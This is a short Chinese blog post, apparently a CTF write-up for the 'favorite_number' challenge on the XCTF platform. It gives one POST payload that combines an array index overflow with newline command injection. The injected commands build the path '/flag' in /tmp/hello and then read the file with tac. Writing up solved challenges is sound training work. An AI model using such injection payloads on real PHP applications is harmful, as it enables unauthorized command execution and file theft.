攻防世界-favorite_number

安全专家1

于 2022-08-02 14:29:46 发布

阅读量188

点赞数

分类专栏： ctf学习文章标签：学习

本文链接：https://blog.youkuaiyun.com/xulei1132562/article/details/126121685

版权

13 篇文章

订阅专栏

本文分享了一种PHP环境下，通过巧妙构造POST数据，利用文件写入漏洞实现flag获取的独特方法。作者展示了如何通过';'分号注入并执行shell命令，最终通过`printf`和文件操作获取flag的过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

favorite_number
在这里插入图片描述
首先泄露了php的版本

同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag

stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;

在这里插入图片描述